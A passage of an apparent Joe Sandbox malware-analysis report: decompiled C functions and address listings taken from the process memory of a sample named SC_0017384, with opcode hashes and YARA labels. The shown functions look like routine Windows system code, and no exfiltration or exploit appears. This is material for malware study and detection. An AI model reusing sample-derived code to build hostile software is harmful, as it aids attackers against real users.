							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0182C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0182A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0180CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0182ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                              0x0182ae44
                                                                              0x0182ae4c
                                                                              0x0182ae53
                                                                              0x0182ae55
                                                                              0x0182ae5c
                                                                              0x0182ae64
                                                                              0x0182ae68
                                                                              0x0182ae75
                                                                              0x0182ae75
                                                                              0x0182ae78
                                                                              0x0182ae7a
                                                                              0x0182ae7c
                                                                              0x0182ae7f
                                                                              0x0182aea8
                                                                              0x0182aeab
                                                                              0x0182aead
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182aeb3
                                                                              0x0182aeb8
                                                                              0x0182aebb
                                                                              0x0182aebd
                                                                              0x00000000
                                                                              0x0182ae81
                                                                              0x0182ae88
                                                                              0x0182ae8f
                                                                              0x0182ae9b
                                                                              0x0182ae96
                                                                              0x0182ae96
                                                                              0x0182ae96
                                                                              0x0182aea0
                                                                              0x0182aea3
                                                                              0x0182aebf
                                                                              0x0182aebf
                                                                              0x0182aec3
                                                                              0x0182aec9
                                                                              0x0182af0d
                                                                              0x0182af14
                                                                              0x0182af3d
                                                                              0x0182af3d
                                                                              0x0182af41
                                                                              0x0182af44
                                                                              0x0182af67
                                                                              0x0182af67
                                                                              0x0182af6a
                                                                              0x0182afca
                                                                              0x0182afd1
                                                                              0x00000000
                                                                              0x0182afd1
                                                                              0x0182af6c
                                                                              0x0182af6d
                                                                              0x0182af75
                                                                              0x0182af7c
                                                                              0x0182af7e
                                                                              0x0182af80
                                                                              0x0182af85
                                                                              0x0182af87
                                                                              0x0182af99
                                                                              0x0182af89
                                                                              0x0182af92
                                                                              0x0182af92
                                                                              0x0182af9e
                                                                              0x0182afa1
                                                                              0x0182afa3
                                                                              0x0182afa9
                                                                              0x0182afb0
                                                                              0x0182afb2
                                                                              0x0182afb4
                                                                              0x0182afbc
                                                                              0x0182afbc
                                                                              0x0182afb4
                                                                              0x0182afb0
                                                                              0x00000000
                                                                              0x0182afa1
                                                                              0x0182af4f
                                                                              0x0182af57
                                                                              0x0182af5c
                                                                              0x0182af5e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182af60
                                                                              0x0182af64
                                                                              0x0182af64
                                                                              0x00000000
                                                                              0x0182af64
                                                                              0x0182af1a
                                                                              0x0182af25
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182af27
                                                                              0x0182af28
                                                                              0x0182af33
                                                                              0x00000000
                                                                              0x0182aed0
                                                                              0x0182aed0
                                                                              0x0182aed2
                                                                              0x0182aee1
                                                                              0x0182aee4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182aee6
                                                                              0x0182aeec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182aefb
                                                                              0x0182af07
                                                                              0x0182afd3
                                                                              0x0182afdb
                                                                              0x0182afdb
                                                                              0x00000000
                                                                              0x0182af07
                                                                              0x0182aed6
                                                                              0x0182aed8
                                                                              0x0182aedf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182aedf
                                                                              0x0182aec9

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7a8c9d222569a4699f042012444ab6498fcc0f7acd0e0d48468ffa7fadf037d4
                                                                              • Instruction ID: f1638e23dc4ed950f2370bfcbc2106e78a73e01315c1493a22b5a3c772184c4b
                                                                              • Opcode Fuzzy Hash: 7a8c9d222569a4699f042012444ab6498fcc0f7acd0e0d48468ffa7fadf037d4
                                                                              • Instruction Fuzzy Hash: 8F41C4B17007229BD72F9A2DC894F3BB79AEF94720F044619F916C7AD0D738DA81C691
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178DBE9 Relevance: .1, Instructions: 149COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E0178DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0176CC50(E01764510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01787D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01838ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01782280(_t58, _v44);
						E0178DD82(_v44, _t102, _t98);
						E0178B944(_t102, _v5);
						return E0177FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1858628; // 0x0
							_v28 = _t67;
							_t68 =  *0x185862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1858628; // 0x0
						_t105 = _v28;
						_t80 =  *0x185862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x182fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                              0x0178dbe9
                                                                              0x0178dbf2
                                                                              0x0178dbf7
                                                                              0x0178dbf9
                                                                              0x0178dbfc
                                                                              0x0178dc00
                                                                              0x0178dc03
                                                                              0x0178dc14
                                                                              0x0178dd54
                                                                              0x0178dd54
                                                                              0x0178dd54
                                                                              0x0178dc18
                                                                              0x0178dc1d
                                                                              0x0178dc1d
                                                                              0x0178dc32
                                                                              0x0178dc3b
                                                                              0x0178dc3e
                                                                              0x0178dc46
                                                                              0x0178dd5b
                                                                              0x0178dd62
                                                                              0x0178dd64
                                                                              0x0178dd67
                                                                              0x0178dd69
                                                                              0x0178dd6b
                                                                              0x0178dd6e
                                                                              0x0178dd70
                                                                              0x0178dd73
                                                                              0x0178dd73
                                                                              0x00000000
                                                                              0x0178dc4c
                                                                              0x0178dc4e
                                                                              0x017d3ae3
                                                                              0x017d3ae8
                                                                              0x017d3aea
                                                                              0x0178dce7
                                                                              0x0178dce9
                                                                              0x0178dcec
                                                                              0x0178dcee
                                                                              0x0178dcf0
                                                                              0x0178dcf3
                                                                              0x0178dcf5
                                                                              0x017d3af2
                                                                              0x017d3af5
                                                                              0x017d3af5
                                                                              0x0178dd06
                                                                              0x0178dd08
                                                                              0x0178dd0b
                                                                              0x0178dd12
                                                                              0x017d3b08
                                                                              0x0178dd18
                                                                              0x0178dd18
                                                                              0x0178dd18
                                                                              0x0178dd20
                                                                              0x0178dd23
                                                                              0x017d3b16
                                                                              0x017d3b16
                                                                              0x0178dd29
                                                                              0x0178dd2d
                                                                              0x0178dd36
                                                                              0x0178dd40
                                                                              0x0178dd51
                                                                              0x0178dd51
                                                                              0x0178dc54
                                                                              0x0178dc59
                                                                              0x0178dc59
                                                                              0x0178dc5e
                                                                              0x0178dc5e
                                                                              0x0178dc63
                                                                              0x0178dc66
                                                                              0x0178dc6b
                                                                              0x0178dc78
                                                                              0x0178dc7b
                                                                              0x0178dc81
                                                                              0x0178dc81
                                                                              0x0178dc83
                                                                              0x0178dc89
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178dd7b
                                                                              0x0178dd7b
                                                                              0x0178dc8f
                                                                              0x0178dc8f
                                                                              0x0178dc92
                                                                              0x0178dc99
                                                                              0x0178dc9f
                                                                              0x0178dca5
                                                                              0x0178dcaa
                                                                              0x0178dcaa
                                                                              0x0178dcb3
                                                                              0x0178dcb8
                                                                              0x0178dcbb
                                                                              0x0178dcc1
                                                                              0x0178dccf
                                                                              0x0178dcd2
                                                                              0x0178dcd5
                                                                              0x0178dcd7
                                                                              0x0178dcda
                                                                              0x0178dcdc
                                                                              0x0178dcdc
                                                                              0x0178dce2
                                                                              0x0178dce4
                                                                              0x00000000
                                                                              0x0178dce4

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 03b1808e3d1d028a11b598c17d21f20bcce95de293a75ed6773004d9937ef3ce
                                                                              • Instruction ID: 1c350514219813625782358562f1a8987162e654f34be63882024eae649fb258
                                                                              • Opcode Fuzzy Hash: 03b1808e3d1d028a11b598c17d21f20bcce95de293a75ed6773004d9937ef3ce
                                                                              • Instruction Fuzzy Hash: 4651A271A00206CFCB25DFA8C480AAEFBF1FB49310F24815AD955E7385DB30A984CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177EF40 Relevance: .1, Instructions: 147COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E0177EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01769080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7709c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01762D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                              0x0177ef4b
                                                                              0x0177ef4d
                                                                              0x0177ef57
                                                                              0x0177f0bd
                                                                              0x0177f0c2
                                                                              0x0177f0d2
                                                                              0x0177f0d2
                                                                              0x0177f0c2
                                                                              0x0177ef5d
                                                                              0x0177ef5f
                                                                              0x0177ef67
                                                                              0x0177ef6a
                                                                              0x0177ef6d
                                                                              0x0177ef74
                                                                              0x0177ef7f
                                                                              0x0177ef82
                                                                              0x0177ef82
                                                                              0x0177ef86
                                                                              0x0177ef88
                                                                              0x0177ef8c
                                                                              0x0177ef8f
                                                                              0x0177ef8f
                                                                              0x0177ef8f
                                                                              0x00000000
                                                                              0x0177ef91
                                                                              0x0177ef93
                                                                              0x0177efc4
                                                                              0x0177efc4
                                                                              0x0177efc4
                                                                              0x0177efca
                                                                              0x0177efd0
                                                                              0x0177f0a6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177f0af
                                                                              0x017cbb06
                                                                              0x017cbb0a
                                                                              0x0177f0b5
                                                                              0x0177f0b5
                                                                              0x0177f0b5
                                                                              0x0177f0b5
                                                                              0x00000000
                                                                              0x0177efd6
                                                                              0x0177efd9
                                                                              0x0177f0de
                                                                              0x0177f0e2
                                                                              0x0177efdf
                                                                              0x0177efdf
                                                                              0x0177efdf
                                                                              0x0177efe5
                                                                              0x017cbafc
                                                                              0x017cbafc
                                                                              0x0177efe5
                                                                              0x0177efeb
                                                                              0x0177efed
                                                                              0x0177f00f
                                                                              0x0177f011
                                                                              0x0177f01a
                                                                              0x0177f01d
                                                                              0x0177f021
                                                                              0x0177f028
                                                                              0x0177f029
                                                                              0x0177f029
                                                                              0x0177f02c
                                                                              0x00000000
                                                                              0x0177f02c
                                                                              0x0177eff3
                                                                              0x0177eff9
                                                                              0x0177f0ea
                                                                              0x0177f0ed
                                                                              0x0177f0ef
                                                                              0x00000000
                                                                              0x0177f0ef
                                                                              0x0177f003
                                                                              0x017cbb12
                                                                              0x0177f045
                                                                              0x0177f049
                                                                              0x0177f051
                                                                              0x0177f09e
                                                                              0x0177f0a0
                                                                              0x0177f0a0
                                                                              0x0177f09e
                                                                              0x0177f053
                                                                              0x0177f064
                                                                              0x0177f064
                                                                              0x0177f06b
                                                                              0x017cbb1a
                                                                              0x017cbb1a
                                                                              0x0177f071
                                                                              0x0177f071
                                                                              0x0177f07d
                                                                              0x0177f082
                                                                              0x0177f08f
                                                                              0x0177f08f
                                                                              0x0177f009
                                                                              0x0177f00d
                                                                              0x00000000
                                                                              0x0177f00d
                                                                              0x0177efd0
                                                                              0x0177ef97
                                                                              0x0177efa5
                                                                              0x0177efaa
                                                                              0x00000000
                                                                              0x0177efac
                                                                              0x0177efac
                                                                              0x0177efac
                                                                              0x00000000
                                                                              0x0177efb2
                                                                              0x0177f036
                                                                              0x0177f03a
                                                                              0x0177f040
                                                                              0x0177f090
                                                                              0x00000000
                                                                              0x0177f092
                                                                              0x0177f042
                                                                              0x00000000
                                                                              0x0177f042
                                                                              0x0177efb7
                                                                              0x0177efb9
                                                                              0x0177efbc
                                                                              0x0177efb0
                                                                              0x0177efb0
                                                                              0x00000000
                                                                              0x0177efbe
                                                                              0x0177efbe
                                                                              0x0177efc1
                                                                              0x00000000
                                                                              0x0177efc1
                                                                              0x0177efbc
                                                                              0x0177efaa
                                                                              0x0177ef91

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                              • Instruction ID: c83b955e167988f571dbed798718ca770af0045ef0ffdf5ff2ec393e7fa471d4
                                                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                              • Instruction Fuzzy Hash: 8B510330A04249DFEF22CB6CC2C0BAEFBB1AF05314F1881E9D56593382C775A989C751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0183740D Relevance: .1, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E0183740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E017BD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E017AF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01784620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01784620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E017AF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01784620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                              0x0183740d
                                                                              0x0183740d
                                                                              0x01837412
                                                                              0x01837413
                                                                              0x01837416
                                                                              0x01837418
                                                                              0x0183741c
                                                                              0x0183741f
                                                                              0x01837422
                                                                              0x01837422
                                                                              0x01837428
                                                                              0x0183742a
                                                                              0x0183742a
                                                                              0x01837451
                                                                              0x01837432
                                                                              0x0183744f
                                                                              0x0183744f
                                                                              0x00000000
                                                                              0x01837434
                                                                              0x01837438
                                                                              0x01837443
                                                                              0x01837517
                                                                              0x01837517
                                                                              0x0183751a
                                                                              0x01837535
                                                                              0x01837520
                                                                              0x01837527
                                                                              0x0183752c
                                                                              0x01837531
                                                                              0x01837533
                                                                              0x00000000
                                                                              0x01837533
                                                                              0x00000000
                                                                              0x01837531
                                                                              0x0183754b
                                                                              0x0183754f
                                                                              0x0183755c
                                                                              0x0183755c
                                                                              0x0183755f
                                                                              0x01837560
                                                                              0x01837561
                                                                              0x01837562
                                                                              0x01837563
                                                                              0x01837568
                                                                              0x0183756a
                                                                              0x0183756c
                                                                              0x0183756d
                                                                              0x0183756d
                                                                              0x0183756f
                                                                              0x01837572
                                                                              0x01837574
                                                                              0x01837577
                                                                              0x0183757c
                                                                              0x0183757f
                                                                              0x00000000
                                                                              0x01837551
                                                                              0x01837551
                                                                              0x01837551
                                                                              0x01837553
                                                                              0x01837553
                                                                              0x01837449
                                                                              0x01837449
                                                                              0x0183744c
                                                                              0x0183744c
                                                                              0x00000000
                                                                              0x0183744c
                                                                              0x01837443
                                                                              0x0183750e
                                                                              0x01837514
                                                                              0x01837514
                                                                              0x01837455
                                                                              0x01837469
                                                                              0x0183746d
                                                                              0x00000000
                                                                              0x01837473
                                                                              0x01837473
                                                                              0x01837476
                                                                              0x01837480
                                                                              0x01837484
                                                                              0x0183748e
                                                                              0x01837493
                                                                              0x01837493
                                                                              0x01837496
                                                                              0x01837499
                                                                              0x018374a1
                                                                              0x018374b1
                                                                              0x018374b5
                                                                              0x00000000
                                                                              0x018374bb
                                                                              0x018374c1
                                                                              0x018374c1
                                                                              0x018374c4
                                                                              0x018374c5
                                                                              0x018374c6
                                                                              0x018374c7
                                                                              0x018374c8
                                                                              0x018374cd
                                                                              0x00000000
                                                                              0x018374d3
                                                                              0x018374d3
                                                                              0x018374d6
                                                                              0x018374d8
                                                                              0x018374db
                                                                              0x018374dd
                                                                              0x018374e0
                                                                              0x018374e7
                                                                              0x018374ee
                                                                              0x018374ee
                                                                              0x018374f4
                                                                              0x018374f9
                                                                              0x00000000
                                                                              0x018374fb
                                                                              0x018374fb
                                                                              0x018374fd
                                                                              0x01837500
                                                                              0x01837503
                                                                              0x01837505
                                                                              0x01837505
                                                                              0x018374f9
                                                                              0x00000000
                                                                              0x018374cd
                                                                              0x018374b5
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                              • Instruction ID: 40983bc486383bcfeea3905d6a4dcd45338929288ead9f095911c834d6db73c2
                                                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                              • Instruction Fuzzy Hash: 71517DB1640646EFDB16CF18C480A96FBB5FF85304F1881AAE908DF256E371EA45CBD0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01792990 Relevance: .1, Instructions: 133COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E01792990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x183ff00);
				E017BD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
